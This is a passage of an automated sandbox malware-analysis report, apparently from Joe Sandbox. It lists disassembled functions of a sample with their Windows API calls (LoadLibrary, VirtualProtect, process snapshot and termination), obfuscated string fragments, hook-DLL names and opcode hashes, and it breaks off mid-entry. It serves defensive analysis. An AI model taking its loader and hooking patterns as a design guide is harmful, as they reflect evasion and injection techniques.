                                      • Opcode Fuzzy Hash: 8a5b82fe3d15e2b9049db49ce0ba258f13ec4bbdf6a4570f9736429d93e05b29
                                      • Instruction Fuzzy Hash: 1461982010C7C4CEE366D728C44875FFFD26BA6708F48499DA1D98A292CBFB8558C763

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • VirtualProtect.KERNELBASE ref: 005B3FFC
                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005B40E4), ref: 005B402B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual$LibraryLoad
                                      • String ID: .$.$2$3$E$N$P$T$V$a$a$c$c$d$d$d$e$e$e$e$e$i$k$l$l$l$l$l$l$l$l$n$n$n$o$r$r$r$r$t$t$t$t$t$t$u$v
                                      • API String ID: 895956442-1938279493
                                      • Opcode ID: 29593c64c5ee00cf69436b8c0dd258b69dee577c9c3611ce782264d4661d657d
                                      • Instruction ID: b78614b32ac8907b9a09df1b16184db5f32317c8e75035ce3d5db1825498b7d3
                                      • Opcode Fuzzy Hash: 29593c64c5ee00cf69436b8c0dd258b69dee577c9c3611ce782264d4661d657d
                                      • Instruction Fuzzy Hash: 9051702040C7C0CAE312D728C45875FFFE26BA6748F48498CB1C54A2A6C7FB9598C767

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • SleepEx.KERNELBASE ref: 005AC768
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoadSleep
                                      • String ID: .$2$3$4$6$C$G$S$T$c$d$e$e$e$e$e$i$k$k$l$l$l$l$n$n$o$p$r$t$t$u
                                      • API String ID: 2118945035-1678096204
                                      • Opcode ID: 0e9d0bfd401814517fb7312cad325cf59919dcbed0c5b293f02dbd59bae740da
                                      • Instruction ID: a972a2bbe0b627d0f12e1b288c88a0bad874826dfb65a3ba06c071d256f31a2c
                                      • Opcode Fuzzy Hash: 0e9d0bfd401814517fb7312cad325cf59919dcbed0c5b293f02dbd59bae740da
                                      • Instruction Fuzzy Hash: 1941802050C7C48AE742D768C448B5FFFD2ABA6748F48099DB1C98A392C7FAC558C767

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 005ABC65: LoadLibraryA.KERNELBASE ref: 005ABCD2
                                      • SleepEx.KERNELBASE ref: 005AD5CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoadSleep
                                      • String ID: .$2$3$S$d$e$e$e$e$k$l$l$l$l$n$p$r
                                      • API String ID: 2118945035-1151806120
                                      • Opcode ID: 4ef0a36a1f249cfd17cfa6607081ee08fb798763e5631dfdcc5d691ec55f17a4
                                      • Instruction ID: cea25475bbdc67bf88d6a05ce37f6f68c9194860cdc287ac09178876a074d0ae
                                      • Opcode Fuzzy Hash: 4ef0a36a1f249cfd17cfa6607081ee08fb798763e5631dfdcc5d691ec55f17a4
                                      • Instruction Fuzzy Hash: FA21E82050CBC48EE741E768844875FFFE2ABAA709F440A5DF0C996292D7FAC558C727

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287901093.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_1f0000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: bc3bdb819496df2ff72cb4def5e53009978536963dbe8734a7591a1aa869c889
                                      • Instruction ID: 044fc6e484cb4987e987d844ad1188199d26d1781f6c98eb2a78d23422867a38
                                      • Opcode Fuzzy Hash: bc3bdb819496df2ff72cb4def5e53009978536963dbe8734a7591a1aa869c889
                                      • Instruction Fuzzy Hash: 7E11C070528B4C9FD784FF28C048B2A7AE1FB98345F944A2DB58AD3260D775C585CB42

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 235e72a7c4a46574d56536a75a93859d3b0f1fc4ed960766b8425097f384a9d1
                                      • Instruction ID: cd847659212ae07db4631e8abb889db73fe9e1e6fb89c0aacaf2138986361cff
                                      • Opcode Fuzzy Hash: 235e72a7c4a46574d56536a75a93859d3b0f1fc4ed960766b8425097f384a9d1
                                      • Instruction Fuzzy Hash: 8E11FE70528B499FE784EF28805C72E7EE1FBD8355F404A1DB489C22A1DB748984CB46

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: f28f014416c05a534b485dd9bf541f64217d3e2b80d74e863d9e5ad7f47072ef
                                      • Instruction ID: 9fcde46676598f2d8985de621c429db9fda3c6d1cd9b1c5194609f7ba9f79def
                                      • Opcode Fuzzy Hash: f28f014416c05a534b485dd9bf541f64217d3e2b80d74e863d9e5ad7f47072ef
                                      • Instruction Fuzzy Hash: 75511776219B4482EB62DB0AF89479A73A4F38CBD8F154126EB8D477B4DB7DC4918700

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: -$-$.$.$.$.$.$.$.$.$/$/$/$2$2$3$3$:$A$A$A$F$F$F$G$G$G$H$H$H$HpS$P$P$P$S$S$S$V$a$a$a$a$a$b$c$c$c$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$g$g$h$h$i$i$i$j$j$j$j$j$j$j$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$n$o$o$o$p$p$p$p$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$x$x$y$y$y$z$z$z
                                      • API String ID: 1029625771-171351980
                                      • Opcode ID: cfdbf4389c9b1104a0e8a4b6bf7caf04d2c30c583f9a0fade0bd550eefe70e9a
                                      • Instruction ID: a80dd1e5b2907ff2429941fbb6b84f142a6324d89976aea9bb1587f8a70a4cfd
                                      • Opcode Fuzzy Hash: cfdbf4389c9b1104a0e8a4b6bf7caf04d2c30c583f9a0fade0bd550eefe70e9a
                                      • Instruction Fuzzy Hash: 29B2E53021C7C48AE776EB28C458BDFBBE1BBE5304F44492D90CE87295DAB5A944CB53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3287953577.00000000005AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AB000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_5ab000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: .$A$A$A$C$F$F$GAOrI$H$H$H$HpS$I$I$I$I$O$O$R$S$U$a$a$a$a$c$c$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$i$i$i$l$l$l$l$l$l$l$l$l$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$p$p$p$p$p$p$r$r$r$r$r$r$s$s$s$t$t$t$t$t$t$t$t$t$w
                                      • API String ID: 1029625771-515521434
                                      • Opcode ID: 40b2e031f8b7b603e680d399ff321b66bd24f4a4aef26e730e424784db91921a
                                      • Instruction ID: 4b407891ff3a653c3c83d082effd25849786edc9a546ddce08b94d3bb3d5002a
                                      • Opcode Fuzzy Hash: 40b2e031f8b7b603e680d399ff321b66bd24f4a4aef26e730e424784db91921a
                                      • Instruction Fuzzy Hash: 7702B73010C7C4CEE772DB28C45879FBFD1ABA6709F04495DA1CD8A292CBBA5598C763
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: Find$FileHeap$AddressAppendPathProc$CloseFreeLibraryNextProcess$AllocDeleteFirstLoad
                                      • String ID: GetFileVersionInfoSizeW$GetFileVersionInfoW$VerQueryValueW$version.dll
                                      • API String ID: 1301769236-8576242
                                      • Opcode ID: 602cf3a18254f789caf50c65d0e444867a13e0ed185ab1c788f2db204bae0101
                                      • Instruction ID: ea85576fe8112d40b92f550af8c0024e37ea0d9b7fc78088941ea10764493b20
                                      • Opcode Fuzzy Hash: 602cf3a18254f789caf50c65d0e444867a13e0ed185ab1c788f2db204bae0101
                                      • Instruction Fuzzy Hash: 65616171714A8586EF26CF22F8443D963A1F78CBD9F405121EB4A4BA79EFB9C649C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: CloseHandle$Process$CreateFirstNextOpenProcess32SnapshotThread32Toolhelp32$CurrentMessageObjectPostSingleTerminateThreadWait
                                      • String ID: ps64ldr.exe
                                      • API String ID: 2684220759-1557747398
                                      • Opcode ID: 2067b6308fb2e066b3524b32a3b0dd7a672f7c8119cc6f74b7a7d0e2c0c7481d
                                      • Instruction ID: ce3777ac4d17e78d67ea8f15511cefb259924c50536e79486557088d44885b05
                                      • Opcode Fuzzy Hash: 2067b6308fb2e066b3524b32a3b0dd7a672f7c8119cc6f74b7a7d0e2c0c7481d
                                      • Instruction Fuzzy Hash: E44175B1600B4182EB2ADB17F8443D963A1F7CDBD1F544225EB1A076B6DF79C589C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: Process$CloseHandleNext$CharExitFirst$CreateFileOpenProcess32SnapshotThread32Toolhelp32$AppendCommandCurrentFindLibraryLineLoadMessageModuleNameObjectPathPostSingleTerminateThreadWaitlstrcmpilstrcpy
                                      • String ID: PSHook64.dll$SetHook$ps64start
                                      • API String ID: 332431168-2610298943
                                      • Opcode ID: 65c069a66cf27f93afbc93d153c66077ebfe7794891ddcc252e1ce5ddb40a19e
                                      • Instruction ID: 968b34224ca3ecc9b49ea74266e049d3f0c14ad38a8c9c0776c80c0bba26cdca
                                      • Opcode Fuzzy Hash: 65c069a66cf27f93afbc93d153c66077ebfe7794891ddcc252e1ce5ddb40a19e
                                      • Instruction Fuzzy Hash: 14313FB120464182EB2BDB63F8507E973A1EB9D7C4F444025FB0A476B6EF7AC548C705
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: Heap$AddressFindProc$FileFreeLibraryProcess$AllocAppendCloseFirstLoadNextPath
                                      • String ID: GetFileVersionInfoSizeW$GetFileVersionInfoW$VerQueryValueW$version.dll
                                      • API String ID: 475380777-8576242
                                      • Opcode ID: d7f5f813a79bebc1c238e42f34f5596fc577a933a9e8701bf825a14ac297f4ef
                                      • Instruction ID: 4da8f5d26d1a9ea8b5913df79916ccdbe08d760e06f24acf903853bd57acbbd7
                                      • Opcode Fuzzy Hash: d7f5f813a79bebc1c238e42f34f5596fc577a933a9e8701bf825a14ac297f4ef
                                      • Instruction Fuzzy Hash: 3A417575714A8186EB62CF62F8443D963A0F78C7E8F444121EF4A476B9EF79C688C740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: 4e319d0093985bc080cbc2daae4a5a4104123b95aa356b5be18928fd961074a8
                                      • Instruction ID: 78d5835676cf84a3f3559e45bea4fc867b78f14f8466544f311317fe0b1257a1
                                      • Opcode Fuzzy Hash: 4e319d0093985bc080cbc2daae4a5a4104123b95aa356b5be18928fd961074a8
                                      • Instruction Fuzzy Hash: B2314972204B8096EB65CB26E8403EE73A4F788798F540126EB9D47BA9EF38C5558B00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: File$AppendFindFirstModuleNamePath
                                      • String ID:
                                      • API String ID: 2030518614-0
                                      • Opcode ID: dbe4185055809a95a0eac1771931ccaa00f21d04fdc49e02113e7dde96a34110
                                      • Instruction ID: 13494c8395834e9dc15df4e1537e68775d7893550f1ec515199dbd1a31cf0460
                                      • Opcode Fuzzy Hash: dbe4185055809a95a0eac1771931ccaa00f21d04fdc49e02113e7dde96a34110
                                      • Instruction Fuzzy Hash: D52190B2210A84A9EB33CF36EC047DA2760F7483EDF005221EB194B9F9DA75C289C744
                                      APIs
                                      • _invalid_parameter_noinfo.LIBCMT ref: 000000014000A954
                                        • Part of subcall function 0000000140008444: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,0000000140008422), ref: 000000014000844D
                                        • Part of subcall function 0000000140008444: GetCurrentProcess.KERNEL32(?,?,?,?,0000000140008422), ref: 0000000140008471
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                      • String ID: *$.$.
                                      • API String ID: 4036615347-2112782162
                                      • Opcode ID: c364aa7ecad30e1254029f38b6a57422b9c5e363ee4b37ae7658774aa9e75e39
                                      • Instruction ID: 624643d2af3229b99a819bc328ec9822a876d738f59f95453bcddc7472bd1619
                                      • Opcode Fuzzy Hash: c364aa7ecad30e1254029f38b6a57422b9c5e363ee4b37ae7658774aa9e75e39
                                      • Instruction Fuzzy Hash: 6451EDB2B10A5485FB12DBA7A9407ED73E0B749BD8F548126EF5927BA5EF38C042C300
                                      APIs
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000000014000474B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 389471666-631824599
                                      • Opcode ID: 84d04b534f0832b10a89640bf131631096d3170d9866c81e3a2688c7e5cda54f
                                      • Instruction ID: 9d174ee9d58f08d33f221478d192a68120145db8746fe30f656db89f5d9125e9
                                      • Opcode Fuzzy Hash: 84d04b534f0832b10a89640bf131631096d3170d9866c81e3a2688c7e5cda54f
                                      • Instruction Fuzzy Hash: F411AC72210B80A7F74ADB23E6443E973A0FB483C0F404524EB5987AA2EF79D074C700
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: b244cf1de7db0b0d67af211d7cb1131ba2d79bbee309d1a629165df779e31f8e
                                      • Instruction ID: 65fe904cf7ba262de353ee627477bf0c51d5cb77785aa7483af7b2b631f21bdf
                                      • Opcode Fuzzy Hash: b244cf1de7db0b0d67af211d7cb1131ba2d79bbee309d1a629165df779e31f8e
                                      • Instruction Fuzzy Hash: 7A3123B271068445EB61DB37A804BEAB791F39ABE4F548625BF6A07BE5DA3CC4018300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise_clrfp
                                      • String ID:
                                      • API String ID: 15204871-0
                                      • Opcode ID: 5206326f4560dfc180925b3f6828435af6a3195b703b0436355fed7301d20b3a
                                      • Instruction ID: 8280efab88331e923b2d5ffd7080e814f94fcf89afacba91d784502ee77bfab9
                                      • Opcode Fuzzy Hash: 5206326f4560dfc180925b3f6828435af6a3195b703b0436355fed7301d20b3a
                                      • Instruction Fuzzy Hash: EFB12CB7610B888BEB56CF2AD4453A87BA0F388B88F15C915EB5D87BB4CB39C451D701
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: c41a1cc13bc989c7c1bf62f537727569f62d510875ace651041afa3cfe282a66
                                      • Instruction ID: 0d5486c96558b43546ee77247e0be0d7310829cdcb12e311ee62cb0fd08255b1
                                      • Opcode Fuzzy Hash: c41a1cc13bc989c7c1bf62f537727569f62d510875ace651041afa3cfe282a66
                                      • Instruction Fuzzy Hash: 39416FB2310A4886EA49CF6AE5543D9B3A1F34CFC4F499026EF5D8B7A4EA3DC5468300
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1d4144b779dec8c52e7fdaa5c7305b7d99a61cd7e10e9453af49e76d1bb080b1
                                      • Instruction ID: c33aa83fde480e7d9ea5238ffe0d1e9cac7217e076ad76c79a130d7b7b159366
                                      • Opcode Fuzzy Hash: 1d4144b779dec8c52e7fdaa5c7305b7d99a61cd7e10e9453af49e76d1bb080b1
                                      • Instruction Fuzzy Hash: 460190F0F255AD09FF599873AA257E240424369BD0C09E030DE0C7BB88E06D9D824104
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d03fc386cee5edb1382ea40f6ffc4ef11c987e5dd3c396b5bc239094b71504e1
                                      • Instruction ID: d5343f999d37678c060b61efe1f76388260f4d72a62b965f4d01a54797dc4237
                                      • Opcode Fuzzy Hash: d03fc386cee5edb1382ea40f6ffc4ef11c987e5dd3c396b5bc239094b71504e1
                                      • Instruction Fuzzy Hash: A3F062B17282948BDBAACF2DA802B5977E0F30C3C4F908029E68987F54D37DC0609F04
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3295320404.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3295306901.0000000140000000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295335825.0000000140011000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295350118.000000014001B000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3295366093.000000014001C000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3296257084.0000000141D76000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_1387457-38765948.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a5dcecb1721a6c2a0bdcdca376210b99c52dd83875adeac6d3bd41af53d55e2
